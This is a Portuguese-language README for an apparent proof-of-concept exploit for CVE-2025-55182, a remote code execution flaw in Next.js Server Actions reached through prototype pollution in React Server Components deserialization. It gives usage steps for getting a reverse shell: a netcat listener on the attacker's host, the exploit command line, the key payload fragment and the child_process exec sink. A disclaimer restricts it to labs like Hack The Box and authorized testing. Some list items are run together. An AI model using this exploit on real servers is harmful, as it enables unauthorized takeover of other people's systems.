
Sei que provavelmente você está aqui vindo do Hack the Box, se for o caso, sim, este realmente funciona.
Uma prova de conceito (PoC) de exploit para CVE-2025-55182, visando uma vulnerabilidade de Execução Remota de Código (RCE) não autenticada em Server Actions do Next.js.
Este exploit abusa da poluição de protótipo durante a desserialização de payloads multipart de React Server Components (RSC) para injetar comandos maliciosos no processo Node.js usando um fluxo de execução assíncrono e não bloqueante.
child_process.exec() em vez de APIs bloqueantes execSync() para evitar travamentos de thread em nós de contêiner.requests do Python.Abra um terminal no seu host atacante e abra um socket listener netcat para capturar a conexão reversa de entrada:
nc -lvnp 4444
Forneça a URL base do alvo, o IP da interface do seu host local e a porta desejada do listener:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
O script envia um payload multipart bruto e forjado diretamente ao endpoint de roteamento da aplicação com o cabeçalho de roteamento Next-Action necessário.
Ao aproveitar assinaturas de construção de objetos via {"get":"$1:constructor:constructor"}, o engine de desserialização polui a árvore de objetos nativa. Ao processar os parâmetros acompanhantes, ele interpreta o bloco de contexto _response embutido maliciosamente como uma fila de instruções, permitindo a execução de código sob os privilégios do contexto do usuário do servidor Node em execução.
// Vetor alvo subjacente:
process.mainModule.require('child_process').exec('your_payload_here');
Este script foi criado estritamente para fins educacionais, testes de segurança autorizados e captura de flags vulneráveis em laboratórios como Hack The Box. O autor não é responsável por qualquer uso indevido, invasões não autorizadas de sistemas ou danos causados por esta ferramenta.